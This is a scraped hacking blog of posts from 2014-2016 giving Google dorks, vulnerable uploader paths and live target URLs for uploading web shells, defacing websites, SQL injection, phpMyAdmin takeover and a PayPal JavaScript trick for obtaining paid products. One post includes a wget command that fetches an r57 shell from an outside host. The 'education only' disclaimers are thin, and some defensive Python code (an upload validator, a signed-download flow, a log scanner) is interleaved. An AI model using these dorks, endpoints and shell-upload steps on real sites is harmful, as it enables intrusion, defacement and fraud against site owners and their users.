
Monday, 20 June 2016

Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey guys, today I found some fresh private Israel 0day exploits, so I thought of sharing them with you all. So let's start.
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|- 
/admin/AdminPics.aspx

When you upload your ASP or PHP shell, just check the page source and you will see your shell URL, for example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp
2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
# Exploit -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php
3). Third 0day Upload Blind Sql Injection

Just target these with Havij or manually; the admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

So that's it guys, we have seen Israel Private 0Day Shell Upload Exploits ASP|PHP. Share it :)

How To Upload Shell in Joomla Via Admin Panel

Hello Guys! Successfully hacked into a Joomla admin panel? Not sure how to upload a shell in Joomla via the admin panel? Well, you are at the right place, because today I'm going to teach you How To Upload Shell in Joomla Via Admin Panel. It's pretty simple! Just follow the steps given below :)

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

How To Upload Shell in Joomla Via Admin Panel:

Suppose we have access to the Joomla admin. Now just log in to it.

Once you log in you will see the below screen.

Then look for Extensions, and in that, Template Manager.

Once you click on that you will see all the templates installed on that site.

See the marking in red, it has the star. It means it's the default template currently used by the site. Select any of the templates, like I did beez in green.

Once you click on beez you will see the following screen. Now just click on Edit HTML.

Once you click on Edit HTML you will see the following screen.

See the red part, /templates/beez/index.php: that is the path of your shell.

Now just paste your shell code over there and save it.

Once you click on save, it will take you to a page where it will show you "Template source saved". Your work is done.

Once that is done you can access your shell. The path of the shell would be

www.site.com/templates/beez/index.php

Thursday, 22 January 2015

Chiangraientersoft HTML Injection Vulnerability





Hello Readers! Today I'm gonna share an HTML Injection Vulnerability. This works mostly on Thailand web pages :). So let's start..

Chiangraientersoft HTML Injection Vulnerability:

1). Go to google and type any of the following dorks :-
inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=
Vulnerable at 'Qform.php' at Field Subject/Title
2). Pick any site!..and replace everything after yoursite.com/ with anyone of the following [Exploit] :
 /webboard/Qform.php
 /board/Qform.php
3). Just fill-up the forum and upload your deface page shell etc..
After your file is successfully uploaded, it would be listed at www.site.com/board/ or www.site.com/webboard/



Saturday, 19 July 2014

Bypass Disabled Upload Option And Upload Shell

Hello Readers! I got many messages from people saying that they were facing many problems in shell uploading, so I have decided to write about this. It's just an example for shell uploading.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Find a vulnerable site that has a disabled upload option. Example:
http://centralplaza.co.th/chiangrai/photoupload.asp
You can also use google dork for finding more:-
inurl:/photoupload.asp



2). Now right click on the page, click on Inspect Element and find the code for the upload button, to enable the disabled upload button :P

3). Now change the text disabled="disabled" to enabled="enabled" and press Enter.
Do the same for the SUBMIT button and finally upload your shell.php.jpg.

4). Now to find your uploaded shell simply click on View All Photos and get your shell :)

Enjoy..!!

Thursday, 19 June 2014

WHMCS Auto 0day Exploiter 5.2.8 by g00n Team Xploiters

Hello Readers! Today I'm going to share a wonderful tool made by g00n Team Xploiters. It's WHMCS Auto 0day Exploiter 5.2.8 by g00n Team Xploiters [PHP] ...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

So Here It Is:-

Here is the PHP code of this WHMCS Auto Exploiter (0day) 5.2.8:-

Note:- You must save it as WHMCS Auto Exploiter.php


So all you have to do in this is crack the hashes. In some cases just Google the hash and you will get the password. Then just log in to WHMCS ...

Scanned results will be saved in a text file: WMCS-Hashes.txt

How to Hack A Targeted Server Or A Website


Hello Readers! Today I am going to teach you how you guys can target a server, find a vulnerability and hack into it: How to Hack A Targeted Server Or A Website, or How to Inject Shell in a Targeted Server or A Website, or How to Target a Website Or Server. This is not very easy but I will try to explain.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Get I.P. Address

First step is to get the I.P. address of the website or server which you wanna hack. So for this we have to ping our target. To do this:
  • Go to Start
  • Open CMD
  • and type:
ping www.yourtarget.com

So, now you have the IP address of your target.

See the following Image as an Example :-


2). Search for Websites hosted on Targeted Server.

Now our second step is to search for vulnerabilities in your targeted server or website. So for this all you have to do is:-
ip:[targets I.P server]

Example:- ip:74.145.128.97

Doing this will display all the websites hosted on your targeted server.

3). Search for vulnerabilities..

Now the third step is to search for vulnerabilities. So for this you can use normal dorks such as .php?id= for SQL injection vulnerable websites, or you can also try any other exploit. Example:-
ip:74.145.128.97 .php?id=



Now try to find an injectable hole or vulnerability and hack into the server or website. That's it :)

You can do the same if you have other bugs for Joomla and other scripts. This method might be old, but it still works as gold. I hope it helps.

Enjoy..!!

Saturday, 19 April 2014

Simple Upload 53 Shell Upload Vulnerability

This vulnerability allows a hacker to upload a shell. A web application vulnerability in the "Simple Upload 53" PHP file allows an attacker to upload backdoor shell code to your website.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Paste the below dork in the google and click search.
inurl:simple-upload-53.php
2). After you search in Google you will find many Websites containing Simple-Upload-53.php at the end of url. Now simply open any of them.



3). Now you can see the upload option in the site. Here is the vulnerability, it allows you to upload files.
You can upload Backdoor shell as ".php.jpg" or ".php.gif" etc.

4). The uploaded shell will be in this place:
http://www.site.com/files/[Your File]
After uploading the shell , You can hack/deface the site.
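
The posts on this page that upload "shell.php.jpg" or re-enable a button that is only disabled in the HTML both depend on the server accepting whatever the browser sends. A server-side check that closes both, as an added example (not code from this blog or from any product it names); the function name validate_upload, the extension lists and the framework-agnostic shape are assumptions:

```python
import os
import secrets

# Name segments a web server or interpreter may execute (constructed list).
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar",
                   "asp", "aspx", "asa", "cer", "jsp", "cgi", "pl", "sh"}

# Allowed final extension -> magic bytes the content must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename, data, uploads_enabled=True):
    """Return (ok, reason, stored_name); stored_name is generated server-side."""
    if not uploads_enabled:
        # The policy lives on the server: a disabled button is not a control.
        return False, "uploads disabled", None
    base = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in base or base.startswith("."):
        return False, "bad filename", None
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension", None
    final_ext = parts[-1]
    if final_ext not in ALLOWED:
        return False, "extension not allowed", None
    # shell.php.jpg: some handler mappings execute on any matching segment.
    if any(p in EXECUTABLE_EXTS for p in parts[1:-1]):
        return False, "executable extension in name", None
    # Magic bytes alone are not sufficient (script text can follow a valid
    # header), so the file is also renamed and must be stored in a directory
    # where the web server never executes scripts.
    if not data.startswith(ALLOWED[final_ext]):
        return False, "content does not match extension", None
    stored_name = secrets.token_hex(16) + "." + final_ext
    return True, "ok", stored_name
```

The client-supplied name is never used on disk, so the uploader cannot predict or choose the stored path.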

WebTester File Upload Vulnerability



Hello Reader, hope you all are enjoying my posts. Here I'm back with a new file upload vulnerability called WebTester File Upload Vulnerability. So let's start..

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Go to Google and type the following dork.
Google Dork : inurl:go.php?testID=
For more results use your brain and create your own dork.
Exploit : http://[target]/[path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
2). Now, upload your html, txt or jpg files

3). To find your uploaded file :-
 http://target/path/test-images/[yourfile].html
Enjoy...

Hack Web Sites Using IIS Exploit [For XP Users]


Hello Readers, I heard some of you are not getting our tutorials because you have no knowledge about web hacking and you wanna learn web hacking. So today I decided to write this tutorial for no0bs.

Because in this tutorial we are going to learn about the IIS web hacking exploit, the easiest way to hack for noobs.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

By using this exploit an attacker can upload a shell, deface the web site, delete data etc. and can do everything without login :D. Yeah, you heard right. I know you all are getting excited, so let's start :-

Note:- this is only for Windows XP users. For Windows 7 users, I will post soon ...

Follow the Instructions:-

1). First of all we need to find a vulnerable site. Go to Google and type the following dork:-

Dork- Intext:"Powered by IIS

Actually there is no particular dork; be creative, use your mind and create your own unique dork :)

If you are unable to find one, don't worry. See the end of the tutorial, I have posted some sites :)

2). After finding a vuln site, click on the Start button and open "RUN"

3). Now type the following code in "RUN"
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

4). Now a folder will open named "Web Folders"

Now right click in that folder, then "New" and then "Web Folder".

5). Now paste the URL of the vulnerable site and click Next.

6). Now it will ask you to give a name for that Web Folder; leave it as it is and click Finish.

7). Congratulations! Now you are in the web site. If you wanna upload a shell, copy your Shell.php into that folder and your shell will be uploaded to the path

Example : site.com/shell.php

Do the same to upload your deface also :D

Here are some sites for practicing ....

Soon I will post a list of vuln. sites for the IIS exploit.

Tuesday, 15 April 2014

Portail Dokeos deface and Shell Upload vulnerability

Portail Dokeos Vulnerability is a kind of FCKeditor remote file upload vulnerability.
In this vulnerability a hacker can upload a shell, deface page or any file on the website without admin username and password...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-

1). Go to Google and enter the following dork
Google Dork :"Portail Dokeos 1.8.5"
2). Open any site and change the URL after site.com to the exploitable target. For example:-

Exploit: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

3). Now change ASP into PHP like FCK editor and upload your deface, shell or file. You can upload .html .php .jpg .txt formats here.

To view your uploaded file go here : http://website/patch/main/upload/your file here

Live Demo:-
http://www.kifofy.fr/kcours/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ecampus.webinfo-concept.fr/main//inc/lib/fckeditor/editor/filemanager/upload/test.html


Encodable Shell File upload Vulnerability

Yeah read it :) :P

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Lets Start:-

1). Open google.com and Enter the following dork
Dork: "intext:File Upload by Encodable"
Result comes with 166,000 results, but some results are fake, they may be malware.
So pick real things only: "Upload a file". You will see this title in the search results :)
Click only the sites which come with the "Upload a file" title.

2). After clicking the link you'll get an upload form...

3). You'll see some options in this form like name, description, email etc.
Type anything in these boxes but add an email in the email box; don't use your own,
put one like billy@microsoft.com, admin@nasa.gov etc :P

4). Now choose your file and upload it :)

5). After clicking on the upload button a pop-up will open ... don't close it, it will close automatically
after uploading the file.

6). In some sites you'll get your uploaded file link after uploading on the website,
and if you did not find it then try these URLs:
/upload/files/
or /upload/userfiles/

Live Demo : http://www.bellblue.com/cgi-bin/filechucker.cgi


Sunday, 13 April 2014

Upload Shell And Deface Via PhpmyAdmin

Earlier I posted about how to get access to phpMyAdmin without login through Google dorks. As I promised, I will post about how to deface using phpMyAdmin. So here it is, let's start...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements(All You Need):-
-You must have the full path 
- pma & mysql db privileges. 

Follow the Instructions:-
1). First log in to MySQL. Or you can use these dorks also: CLICK HERE.

2). Now click 'Show MySQL system variables' then 'SQL'. Now you can run SQL commands, like create db, delete tables or whatever. We want to upload a shell so let's move on to it.

3). Now we will create a cmd line in a new file, with SELECT INTO. SELECT "" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'.

4). Now, the cmd line is here: http://site.com/cmd.php. Let's run the command to get the shell. wget http://www.r57.biz /r57.txt;mv r57.txt shell.php. That's all, then we have the shell on the site!

Saturday, 12 April 2014

PhpmyAdmin Exploit with Google Dorks




Hello Reader! Today I'm going to show you how to exploit phpMyAdmin with Google dorks. You don't need to do anything, no login, nothing: just put the dork and open any site and you will go directly to phpMyAdmin :). So let's start...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-
1). Enter the following Dork in Google.
Dork: allinurl:index.php?db=information_schema
2). It will show you about 80,800 results. So now you can guess how many vuln sites are there :D. Open any site and you will be redirected to phpMyAdmin :D

This dork bypasses the admin username and password and takes you directly to the information schema tables to get data, and you can delete data.

Learn To Deface VIA PhpmyAdmin:-
How to deface using PHPmyAdmin..

Hope you all are enjoying my blog posts. If you like our tutorials please leave valuable comments ...

Friday, 11 April 2014

0Day Smokybyte SQL Injection Vulnerability 2016



[~] Exploit Title: Smokybyte SQL Injection Vulnerability
[~] Google Dork: intext:"Site by Smokybyte"
[~] Date: 08/04/2014
[~] Exploit Author: Tw-Root [ RedKit ]
[~] Tested on: Windows 7 and 8

Updated! 2016

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.
[+] SQLi Exploit Http://WebSite.Com/[path]/***.php?id=[SQLi]
[+] Demo http://www.gcircuit.com/gallery-de.php?id=[SQLi]

Tuesday, 01 April 2014

HACK Website with RTE Webwiz Vulnerability | File Shell upload


Guys, again I'm here with a new web vulnerability called HACK Website with RTE Webwiz Vulnerability | File Shell upload.
Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page .So Lets start..

Follow The Instructions:-

1). Exploits:-
  • site.com/rte/RTE_popup_file_atch.asp 
  • site.com/admin/RTE_popup_file_atch.asp
2). Go to google and type one of the following dorks.

  • inurl:rte/my_documents/my_files
  • inurl:/my_documents/my_files/ 

3). Open any site ..say

site.com/rte/my_documents/my_files/

4). Now replace every thing after site.com with
 rte/RTE_popup_file_atch.asp 
so it will look like-
site.com/rte/RTE_popup_file_atch.asp 

5). Open it and upload your shell or deface

6). Now click on the upload button and after that you will get the path to your uploaded file in the FILE URL box

Happy hacking.. Only for Educational Purposes..!

Thursday, 27 March 2014

Spaw Shell Upload Vulnerability

Hello friends, today I'm going to share another shell upload vulnerability with you all, called Spaw Shell Upload Vulnerability.. 2016

Follow the Instructions:-

1). Go to google and paste one of the following dorks as you like :)
  inurl:"spaw2/dialogs/"
  inurl:"spaw2/uploads/files/"
2). You will get lots of results. Open any site..
For Example i got :- example.com/spaw2/dialogs/
3). Now replace spaw2/dialogs/ with
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
  So now our url will look like this :-
example.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
4). Now open the site and it will look like this->



5). Now upload your deface page.. :)

Happy Hacking.. Only for educational purposes..

Sunday, 16 March 2014

Paypal Javascript Exploit - Get Products Free

In this tutorial we are talking about the Paypal JavaScript exploit. So here is a simple JavaScript exploit through which you can hack Paypal and download products for free without spending a single penny. More than 500 sites are vulnerable!



So lets start..! ;)

Follow The Instructions:-


1). Go to the vulnerable site, paste the JavaScript given below in the browser and hit enter.

javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

2). So after you have hit enter, just sit back and enjoy the free product.

3). So after you paste the JavaScript in the URL, the product will be automatically downloaded :)





More vulnerable sites link: Click Here (some sites are patched)

Enjoy...!!
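
The JavaScript above works only because the shop put the download location in the payment form's hidden "return" field and treated arriving there as proof of payment. A fulfilment flow where the return page carries no entitlement, as an added example (not code from this blog, PayPal or any shop); the order store, the secret, the function names and the separately verified payment notification are assumptions:

```python
import hashlib
import hmac
import time

SECRET = b"constructed-demo-key"  # assumption: per-site key, kept server-side
ORDERS = {"1001": {"paid": False, "file": "ebook.pdf"}}  # constructed order store


def mark_paid_from_verified_notification(order_id):
    # Assumption: called only after the payment provider's server-to-server
    # notification for this order has been verified, never from the browser.
    ORDERS[order_id]["paid"] = True


def _sign(order_id, exp):
    return hmac.new(SECRET, f"{order_id}:{exp}".encode(), hashlib.sha256).hexdigest()


def issue_download_token(order_id, now=None, ttl=900):
    """Return a short-lived signed token, or None if the order is not paid."""
    order = ORDERS.get(order_id)
    if not order or not order["paid"]:
        return None
    exp = int(now if now is not None else time.time()) + ttl
    return f"{order_id}:{exp}:{_sign(order_id, exp)}"


def resolve_download(token, now=None):
    """Return the file name for a valid, unexpired token on a paid order."""
    try:
        order_id, exp, sig = token.split(":")
        exp_i = int(exp)
    except ValueError:
        return None
    if not hmac.compare_digest(sig.encode(), _sign(order_id, exp_i).encode()):
        return None
    if (now if now is not None else time.time()) > exp_i:
        return None
    order = ORDERS.get(order_id)
    if not order or not order["paid"]:
        return None
    return order["file"]


def handle_return(order_id):
    # Anyone can request the return URL, so it only reports server-side state.
    token = issue_download_token(order_id)
    return ("download", token) if token else ("pending", None)
```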

Saturday, 15 March 2014

Testing Image Shell and Deface Upload Vulnerability


In this tutorial we are talking about Testing Image Shell and Deface Upload Vulnerability. So lets start..

Follow the Instructions:


1). Search the following dorks.

Dorks:
inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
intitle:"Testing Image Collections"

2). Use both Google and Bing to search the above dork to find more vulnerable websites. 

3). Select any website from the search results. Find the upload option in the bottom left corner.





4). Now, Select your deface or Shell and Upload it.

To view your Uploaded shell or deface visit:
http://website.com/files/yourfilehere  

 http://websites.com/path/yourfilehere

Happy Hacking!! Only for Educational purposes..!!


Friday, 14 March 2014

File Thingie Shell Upload Exploit Vulnerability


This is a vulnerability which allows a remote attacker to upload his/her deface or shell on the website.

Follow the Steps=>

1). Go to google and search this dork. :)
Google Dork : inurl:ft2.php intext:upload

2). After searching the above dork, you will get websites vulnerable to this.

3). Select any website, upload your deface or shell there.

4). To view your deface or shell, just click on your file name after it's uploaded.

Happy Hacking. Only for Educational Purposes ..!!!!!
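
Most posts on this page come down to two events a site owner can see in an access log: a request to a bundled editor or file-manager uploader, then a request for a script inside an upload directory. A log check for that pair, as an added example (not code from this blog); the log lines are constructed, and the combined log format, the directory names and the severity labels are assumptions:

```python
import re

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Uploader endpoints named in the posts on this page.
UPLOADER_RE = re.compile(
    r"(xinha/plugins/(ImageManager|ExtendedFileManager)/manager\.php"
    r"|fckeditor/editor/filemanager/upload/test\.html"
    r"|tiny_mce/plugins/filemanager/InsertFile/insert_file\.php"
    r"|RTE_popup_file_atch\.asp"
    r"|spaw2/dialogs/dialog\.php"
    r"|simple-upload-53\.php"
    r"|/ft2\.php)", re.I)

# A script extension, optionally followed by one more (shell.php.jpg),
# requested from a directory meant to hold uploaded content.
SCRIPT_IN_UPLOADS_RE = re.compile(
    r"/(files|upload|uploads|banners|my_files|test-images)/"
    r"[^?]*\.(aspx|asp|phtml|php)(\.[a-z0-9]+)?(\?|$)", re.I)

# Constructed sample lines (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Apr/2014:10:01:02 +0000] "GET /spaw2/dialogs/dialog.php?module=spawfm&type=files HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Apr/2014:10:01:40 +0000] "POST /spaw2/dialogs/dialog.php?module=spawfm&type=files HTTP/1.1" 200 812',
    '203.0.113.7 - - [12/Apr/2014:10:02:05 +0000] "GET /spaw2/uploads/files/a1.php.jpg HTTP/1.1" 200 64',
    '198.51.100.9 - - [12/Apr/2014:10:03:00 +0000] "GET /files/photo.jpg HTTP/1.1" 200 20480',
    '198.51.100.9 - - [12/Apr/2014:10:03:10 +0000] "GET /ft2.php HTTP/1.1" 404 230',
]


def scan(lines):
    """Return (severity, ip, path, reason) tuples in log order."""
    posted = {}  # ip -> uploader paths that accepted a POST from it
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path = m["ip"], m["method"], m["path"]
        status = int(m["status"])
        if UPLOADER_RE.search(path) and status < 400:
            sev = "medium" if method == "POST" else "low"
            findings.append((sev, ip, path, "exposed uploader reachable"))
            if method == "POST":
                posted.setdefault(ip, []).append(path)
        elif SCRIPT_IN_UPLOADS_RE.search(path) and status == 200:
            # Same client uploaded first: treat as a likely web shell.
            sev = "high" if ip in posted else "medium"
            findings.append((sev, ip, path, "script served from upload directory"))
    return findings
```

Any "low" hit already means the uploader is reachable without authentication and should be removed or placed behind access control.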
